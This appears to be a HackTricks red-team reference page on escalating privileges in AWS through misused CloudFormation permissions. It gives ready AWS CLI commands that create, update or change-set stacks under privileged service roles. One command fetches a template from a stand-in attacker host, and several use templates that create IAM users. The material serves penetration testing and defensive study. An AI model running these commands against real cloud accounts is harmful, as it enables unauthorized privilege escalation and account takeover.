Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about cloudformation check:
{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} aws-cloudformation-and-codestar-enum.md {% endcontent-ref %}
An attacker with these permissions can escalate privileges by crafting a CloudFormation stack with a custom template, hosted on their server, to execute actions under the permissions of a specified role:
aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>
In the following page you have an exploitation example with the additional permission cloudformation:DescribeStacks
:
{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {% endcontent-ref %}
Potential Impact: Privesc to the cloudformation service role specified.
In this case you can abuse an existing cloudformation stack to update it and escalate privileges as in the previous scenario:
aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1
The cloudformation:SetStackPolicy
permission can be used to give yourself UpdateStack
permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role specified.
If you have this permission but no iam:PassRole
you can still update the stacks used and abuse the IAM Roles they have already attached. Check the previous section for exploit example (just don't indicate any role in the update).
The cloudformation:SetStackPolicy
permission can be used to give yourself UpdateStack
permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role already attached.
iam:PassRole
,((cloudformation:CreateChangeSet
, cloudformation:ExecuteChangeSet
) | cloudformation:SetStackPolicy
)
An attacker with permissions to pass a role and create & execute a ChangeSet can create/update a new cloudformation stack abuse the cloudformation service roles just like with the CreateStack or UpdateStack.
The following exploit is a variation of the CreateStack one using the ChangeSet permissions to create a stack.
aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1
echo "Waiting 2 mins to change the stack"
sleep 120
aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1
echo "Waiting 2 mins to execute the stack"
sleep 120
aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1
The cloudformation:SetStackPolicy
permission can be used to give yourself ChangeSet
permissions over a stack and perform the attack.
Potential Impact: Privesc to cloudformation service roles.
This is like the previous method without passing IAM roles, so you can just abuse already attached ones, just modify the parameter:
--change-set-type UPDATE
Potential Impact: Privesc to the cloudformation service role already attached.
An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
Potential Impact: Privesc to cloudformation service roles.
An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
Potential Impact: Privesc to the attached cloudformation roles.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.